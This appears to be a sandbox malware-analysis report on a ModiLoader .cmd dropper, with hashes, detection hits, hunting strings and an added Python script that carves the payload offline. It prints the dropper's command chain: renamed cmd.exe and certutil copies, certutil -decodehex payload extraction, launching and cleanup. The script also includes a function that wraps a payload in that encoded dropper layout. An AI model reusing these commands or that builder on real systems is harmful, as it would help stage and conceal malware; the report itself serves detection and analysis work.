Analysis
max time kernel: 145s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-11-2024 02:08
Static task: static1
Behavioral task: behavioral1
  Sample: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
  Resource: win10v2004-20241007-en
General
Target: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd
Size: 3.3MB
MD5: 55275e90f2a4ca23422103276e8eae71
SHA1: 1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
SHA256: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
SHA512: 4ca26d59cba2e38751f527b12d040f1e5e67742020e3e0f93551b60f8600451e438c547d3c954778fc019889f93fb39a89ef5b214c4433a6c3f220ddabe7c26d
SSDEEP: 24576:IHZYL1t28pLiMl5F3p03CX4axBJGhRCB4L90l6f2tliYajE/BPbN650iKBzFufPS:I5YLHFi05X03krZUFCsILZ4AX
Malware Config
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
Modiloader family
ModiLoader Second Stage: 61 IoCs
resource / yara_rule: 61 memory dumps of PID 1380 (AnyDesk.PIF), named behavioral2/memory/1380-<n>-0x0000000002EE0000-0x0000000003EE0000-memory.dmp for n = 28, 32-43, 45-91 and 93, each matching yara rule modiloader_stage2. Every hit is the same 16 MiB region 0x0000000002EE0000-0x0000000003EE0000, i.e. the unpacked second stage sits in one private allocation of that process for the whole run.
Executes dropped EXE: 8 IoCs
PID   Process
372   alpha.exe
4396  alpha.exe
3656  kn.exe
2820  alpha.exe
4004  kn.exe
1380  AnyDesk.PIF
2340  alpha.exe
3084  alpha.exe
System Location Discovery: System Language Discovery: 1 TTPs, 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description: Key opened; ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; process: AnyDesk.PIF
Script User-Agent: 1 IoCs
Uses user-agent string associated with script host/environment. "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" is the default User-Agent of the WinHttp.WinHttpRequest COM object, so the download was made through that object rather than a browser; the string is a usable proxy-log hunt value.
description: HTTP User-Agent header; flow: 21; ioc: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious use of WriteProcessMemory: 21 IoCs
Entries are "writer PID (process) -> target PID [procid_target]"; the report lists most pairs twice and the AnyDesk.PIF launch three times, shown here as counts. Every target is a direct child of the writer in the process tree below, so this signature reflects cmd.exe creating its children rather than injection into an unrelated process.
2656 (cmd.exe) -> 4860 [84]  x2
2656 (cmd.exe) -> 372 [85]  x2
372 (alpha.exe) -> 3840 [86]  x2
2656 (cmd.exe) -> 4396 [87]  x2
4396 (alpha.exe) -> 3656 [88]  x2
2656 (cmd.exe) -> 2820 [90]  x2
2820 (alpha.exe) -> 4004 [91]  x2
2656 (cmd.exe) -> 1380 [94]  x3
2656 (cmd.exe) -> 2340 [95]  x2
2656 (cmd.exe) -> 3084 [96]  x2
Processes
The chain reads: cmd.exe runs the .cmd; extrac32 /C (single-file copy mode) copies cmd.exe to C:\Users\Public\alpha.exe and, through that copy, certutil.exe to C:\Users\Public\kn.exe; the renamed certutil carves a blob out of the .cmd file itself into AnyDesk.jpeg (decode type 9) and decodes that into C:\Users\Public\Libraries\AnyDesk.PIF (decode type 12); the .PIF, a PE under an extension Windows still executes, is launched and becomes the ModiLoader process (PID 1380); finally kn.exe and AnyDesk.jpeg are deleted. The doubled backslashes and the "/ A / F / Q / S" spacing come from the script as written and survive in the logged command lines, so they double as hunt strings.

[1] C:\Windows\system32\cmd.exe  (PID 2656)
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\extrac32.exe  (PID 4860)
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  [2] C:\Users\Public\alpha.exe  (PID 372)
      C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\extrac32.exe  (PID 3840)
        extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  [2] C:\Users\Public\alpha.exe  (PID 4396)
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Public\kn.exe  (PID 3656)
        C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
        - Executes dropped EXE
  [2] C:\Users\Public\alpha.exe  (PID 2820)
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Public\kn.exe  (PID 4004)
        C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
        - Executes dropped EXE
  [2] C:\Users\Public\Libraries\AnyDesk.PIF  (PID 1380)
      C:\Users\Public\Libraries\AnyDesk.PIF
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
  [2] C:\Users\Public\alpha.exe  (PID 2340)
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE
  [2] C:\Users\Public\alpha.exe  (PID 3084)
      C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
      - Executes dropped EXE
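The two kn.exe lines say more than the sandbox shows directly: a trailing 9 tells certutil to find a -----BEGIN X509 CRL----- / -----END X509 CRL----- block and base64-decode only what lies between the headers (so the batch commands ahead of it are skipped), and a trailing 12 tells it to treat its input as bare hex. Replaying those two steps offline recovers AnyDesk.PIF from the .cmd without running anything. The Python below is an added example, not the report's or the sample's code: the type-code semantics are Windows' own, but the .cmd layout it builds (batch lines, exit /b, then the wrapped blob) and the toy payload are constructed assumptions, because the page does not show the dropper's contents.

```python
import base64
import binascii
import hashlib
import re

# CryptStringToBinary type codes, the trailing "9" and "12" on the page's kn.exe lines
CRYPT_STRING_BASE64X509CRLHEADER = 9   # base64 text between X509 CRL BEGIN/END header lines
CRYPT_STRING_HEXRAW = 12               # bare hex digits, no address column, no ASCII column

BEGIN = b"-----BEGIN X509 CRL-----"
END = b"-----END X509 CRL-----"


def decode_base64_crl_header(data: bytes) -> bytes:
    """Stage 1 (type 9): decode only the text between the CRL header lines; whatever
    precedes the block (here, the batch commands) is ignored, as certutil does."""
    start = data.find(BEGIN)
    stop = data.find(END, start) if start >= 0 else -1
    if start < 0 or stop < 0:
        raise ValueError("no X509 CRL header block in input")
    body = re.sub(rb"\s+", b"", data[start + len(BEGIN):stop])
    return base64.b64decode(body, validate=True)


def decode_hexraw(data: bytes) -> bytes:
    """Stage 2 (type 12): plain hex pairs; line breaks are tolerated, nothing else is."""
    return binascii.unhexlify(re.sub(rb"\s+", b"", data))


def carve(cmd_file: bytes) -> bytes:
    """Replay both kn.exe invocations offline and return the bytes of AnyDesk.PIF."""
    jpeg = decode_base64_crl_header(cmd_file)  # kn -decodehex -F <sample>.cmd AnyDesk.jpeg 9
    return decode_hexraw(jpeg)                  # kn -decodehex -F AnyDesk.jpeg AnyDesk.PIF 12


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def summarize(cmd_file: bytes) -> dict:
    stage1 = decode_base64_crl_header(cmd_file)
    payload = decode_hexraw(stage1)
    return {"stage1_len": len(stage1), "payload_len": len(payload),
            "is_pe": payload[:2] == b"MZ", "sha256": sha256_hex(payload)}


def build_sample(payload: bytes) -> bytes:
    """Constructed stand-in for the dropper (assumed layout, the real file is not on the
    page): the batch lines from the process tree, 'exit /b' so cmd.exe stops reading before
    the blob, then the payload hex-encoded (stage 2 layer) inside base64 CRL headers (stage 1)."""
    hexraw = binascii.hexlify(payload)
    hexraw = b"\r\n".join(hexraw[i:i + 64] for i in range(0, len(hexraw), 64))
    b64 = base64.encodebytes(hexraw).replace(b"\n", b"\r\n").rstrip()
    sample = b"C:\\Users\\Admin\\AppData\\Local\\Temp\\0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596.cmd"
    lines = [
        b"@echo off",
        b'extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"',
        b"C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe",
        b'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "' + sample + b'" "C:\\Users\\Public\\AnyDesk.jpeg" 9',
        b'C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12',
        b"exit /b",
        b"",
        BEGIN, b64, END, b"",
    ]
    return b"\r\n".join(lines)


if __name__ == "__main__":
    toy = b"MZ" + bytes(range(256)) * 4   # constructed placeholder, not the real AnyDesk.PIF
    print(summarize(build_sample(toy)))
```

Run against the real .cmd, carve() gives the bytes that certutil wrote to AnyDesk.PIF; hashing them with sha256_hex is how you would tie the carved file to the PID 1380 image without detonating it. The intermediate stage-1 output is ASCII hex and roughly twice the size of the PE, which is why the 3.3MB script yields a much smaller executable.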
Network
MITRE ATT&CK Enterprise v15
Downloads
Four files were downloaded during the run; the report records only their size and hashes, not names or URLs.

Download 1: 2.4MB
  MD5: b25f8b243fa4e165791ef4db2ed58251
  SHA1: cf923845aac7ee38eaddea46069a98eb3e1f2ad1
  SHA256: 564768d36462eb6b5ed7c299f612ecde7938a9f7b239bdc116f730e13fa4203e
  SHA512: c6fb85ecd6a48266807a89a64fd52962a1d3e4413fdeaf5a90f400cd6abf9ec7379e7c38eea013a8e54ba8b0f0ad86307feb40d08bb71b13a96012d15e38c28b

Download 2: 1.2MB
  MD5: e02910d2d83f40faef8719a99ee0ef5b
  SHA1: 49f932b32703d21b2041f36829d87353e64ae685
  SHA256: 326a9344d8d5ce3e59d1c8560043d4ebd87ba53b732b635fab2d8afa210c5c05
  SHA512: a55d2321fe633cae781b5868763c9f778b3413d24aa0c83a99bd4e12bd489ec2cbac3bca1fea04a8233a542fbf609b33db697e32180d3948deda723b096f60b2

Download 3: 283KB
  MD5: 8a2122e8162dbef04694b9c3e0b6cdee
  SHA1: f1efb0fddc156e4c61c5f78a54700e4e7984d55d
  SHA256: b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
  SHA512: 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download 4: 1.6MB
  MD5: bd8d9943a9b1def98eb83e0fa48796c2
  SHA1: 70e89852f023ab7cde0173eda1208dbb580f1e4f
  SHA256: 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
  SHA512: 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b